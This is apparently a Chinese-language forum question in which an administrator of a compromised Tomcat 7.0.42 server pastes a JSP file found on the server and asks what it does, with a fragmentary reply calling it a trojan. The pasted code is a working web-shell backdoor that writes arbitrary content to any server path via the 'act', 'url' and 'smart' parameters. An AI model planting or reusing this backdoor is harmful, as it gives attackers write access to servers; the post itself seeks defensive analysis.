我有一个最近被利用的web应用程序。该服务器是tomcat 7.0.42。我在服务器上找到了我没有上传的文件。你知道他们为什么出现?在这里,我向你展示其中一个文件的内容,有谁能告诉我它想做什么?这是什么代码在做
<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>
<% int i=0; String method=request.getParameter("act"); if(method!=null && method.equals("yoco")) {
String url=request.getParameter("url");
String text=request.getParameter("smart");
File f=new File(url);
if(f.exists()) {
f.delete();
}
try{
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());
o.close();
} catch (Exception e) {
i++;
%>0<%
}
}
if(i==0){
%>1<%
}%>
<form action='?act=yoco' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url">
<br>
<textarea rows="20" cols="80" name="smart">
我认为是从
看起来像一个特洛伊木马,试图用内容替换一些jsp作为“智能”参数发送和执行它... –